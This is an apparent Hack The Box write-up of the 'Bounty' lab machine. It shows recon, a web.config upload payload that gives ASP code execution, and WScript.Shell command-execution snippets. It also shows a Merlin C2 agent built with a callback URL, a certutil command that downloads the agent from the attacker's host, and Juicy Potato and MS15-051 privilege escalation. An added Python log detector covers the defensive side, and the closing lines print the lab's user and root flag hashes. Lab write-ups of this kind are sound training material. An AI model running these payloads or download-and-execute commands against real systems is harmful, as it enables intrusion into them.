Windows Boxes

bounty

  1. nmap
  2. http
    1. gobuster
      1. transfer.aspx
  3. file extension spraying with burpsuite's intruder
    1. intruder extension bruteforce
  4. web.config for RCE
    1. upload web.config
  5. simple aspx command
    1. burp
      1. swap in shells.aspx
      2. ping myself
  6. root through MERLIN
    1. merlin dl
      1. create x509 cert
      2. run merlin
      3. compile merlin agent
        1. default agent w/o params builds for linux
      4. upload agent.exe to victim
      5. if you need to kill merlin:
      6. certutil agent
        1. run agent
    2. merlin
      1. info
      2. powerup
      3. whoami priv
    3. juicy potato
      1. upload with merlin
  7. root through ms15-051 and NC
    1. msf port listener
    2. upload file
    3. upload ms15-051 and NC64.exe
    4. privesc
  8. usr/root
  9. Lessons Learned

bounty

images/271-1.png
images/271-2.png

nmap

nmap -sV -sC -oA bounty 10.10.10.93
images/273-1.png
the only open port is 80, running IIS httpd 7.5

http

images/525-1.png
images/525-2.png

gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list -x aspx -u 10.10.10.93
images/274-1.png

images/274-2.png
Transfer.aspx is worth noting

transfer.aspx

transfer.aspx has an upload button! let's see if we can take advantage of it
images/276-1.png

let's try uploading a simple text file
images/276-2.png

file extension spraying with burpsuite's intruder

here we're going to find out which extensions from this list are acceptable upload formats for bounty

images/280-1.png

we'll test which extensions the webserver will accept with burpsuite's intruder:

to add a variable we can brute force, use the images/280-2.png button
images/280-3.png

images/280-4.png

intruder extension bruteforce

we'll paste the extension list into intruder's payload options
images/282-1.png
images/282-2.png


Looking at intruder's response lengths, we see one file type whose response differs from the others
images/282-3.png
A closer look confirms it: .config files are accepted images/282-4.png

web.config for RCE

https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
images/275-1.png

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

upload web.config

images/278-1.png

since gobuster discovered an /UploadedFiles directory, let's see if our web.config got uploaded there
images/278-2.png
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)

We have code execution!
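From the defender's side, the trace this leaves in the IIS W3C log is a POST to the upload page followed by a 200 for web.config under the upload directory (a server that still denies .config / hides web.config answers 404 there). The detector below is an added example, not part of the original writeup; the log lines are constructed (only 10.10.10.93, 10.10.14.62, transfer.aspx and /UploadedFiles come from the page) and the field order is the IIS W3C default, which the parser reads from the #Fields header.

```python
# Added example: flag upload-then-execute of web.config in IIS W3C logs.
import re

# Constructed sample log (not a capture from the box). Real IIS logs join
# spaces in User-Agent with '+', so whitespace splitting is safe.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2018-07-01 10:00:01 10.10.10.93 GET /transfer.aspx - 80 10.10.14.62 Mozilla/5.0 200
2018-07-01 10:00:09 10.10.10.93 POST /transfer.aspx - 80 10.10.14.62 Mozilla/5.0 200
2018-07-01 10:00:15 10.10.10.93 GET /UploadedFiles/web.config - 80 10.10.14.62 Mozilla/5.0 200
2018-07-01 10:01:00 10.10.10.93 GET /UploadedFiles/report.pdf - 80 10.10.14.70 Mozilla/5.0 200
2018-07-01 10:02:00 10.10.10.93 GET /UploadedFiles/web.config - 80 10.10.14.71 curl/7.6 404
"""

UPLOAD_PAGE = "/transfer.aspx"   # upload form seen on the page
UPLOAD_DIR = "/uploadedfiles/"   # where gobuster showed uploads land
# Extensions IIS may hand to a script processor; .config is the one abused here.
HOT_EXT = re.compile(r"\.(config|asp|aspx|ashx|asmx)$", re.I)

def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_config_upload_abuse(text):
    """Return (client_ip, uri) pairs where a client POSTed to the upload page
    and later fetched a script-capable file under the upload directory with
    HTTP 200. A 404 means request filtering / hiddenSegments still held."""
    posted = set()
    hits = []
    for rec in parse_w3c(text):
        ip, uri = rec["c-ip"], rec["cs-uri-stem"]
        if rec["cs-method"] == "POST" and uri.lower() == UPLOAD_PAGE:
            posted.add(ip)
        elif (ip in posted and uri.lower().startswith(UPLOAD_DIR)
              and HOT_EXT.search(uri) and rec["sc-status"] == "200"):
            hits.append((ip, uri))
    return hits

if __name__ == "__main__":
    for ip, uri in find_config_upload_abuse(SAMPLE_LOG):
        print(f"ALERT {ip} executed uploaded {uri}")
```

The same walk over a real log needs only the path to the w3c file in place of SAMPLE_LOG; the 404 line shows why the check keys on status and not just on the URI.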

simple aspx command

now that we know we have code execution, let's see if we can inject something a little more sinister than a math function
images/284-1.png

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()
Response.write(o)
%>

burp

images/285-1.png

swap in shells.aspx

<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
images/286-1.png

images/286-2.png


unfortunately, our Response.write(o) call, which should output whoami's response, is not getting run
images/286-3.png

ping myself

<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.62")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->


images/288-1.png
images/288-2.png

root through MERLIN

merlin dl

images/287-1.png

create x509 cert

openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=stefano.rocks" -days 7

images/290-1.png

run merlin

go run cmd/merlinserver/main.go -i 10.10.14.62
images/292-1.png
images/292-2.png

compile merlin agent

images/291-1.png

This changes the default callback URL compiled into the agent binary for Windows

images/291-2.png

images/291-3.png

default agent w/o params builds for linux

go build -ldflags "-X main.url=https://10.10.14.62:433" -o test.exe main.go
images/293-1.png

file test.exe

images/293-2.png

upload agent.exe to victim

images/294-1.png

images/294-2.png

if you need to kill merlin:

netstat -alnp | grep 443

find which process is listening on 127.0.0.1:443

kill <processID>
kill -9 <processID>

certutil agent

certutil -urlcache -split -f http://10.10.14.62/agent.exe C:\users\public\agent.exe

images/296-1.png

run agent

images/289-1.png

images/289-2.png
images/289-3.png

merlin

info
powerup
whoami /priv

info

images/298-1.png

powerup

images/299-1.png
images/299-2.png
images/299-3.png
images/299-4.png
images/299-5.png

whoami priv

images/300-1.png

big find images/300-2.png

juicy potato

juicy potato abuses the SeImpersonatePrivilege privilege held by the service account
images/301-1.png

upload with merlin

images/302-1.png
images/302-2.png


to run juicy potato:
./jp.exe -t * -p c:\users\public\agent.exe -l 9001
images/302-3.png
images/302-4.png

root through ms15-051 and NC

msf port listener

msfconsole -r unicorn.rc

upload file

images/309-1.png
images/309-2.png


and we have our foothold!
images/309-3.png

upload ms15-051 and NC64.exe

images/305-1.png
images/305-2.png

images/305-3.png

privesc

images/306-1.png

images/306-2.png

and we're system!
images/306-3.png

usr/root

images/311-1.png
e29ad89891462e0b09741e3082f44a2f

images/311-2.png
c837f7b699feef5475a0c079f9d4f5ea

Lessons Learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1453-1.png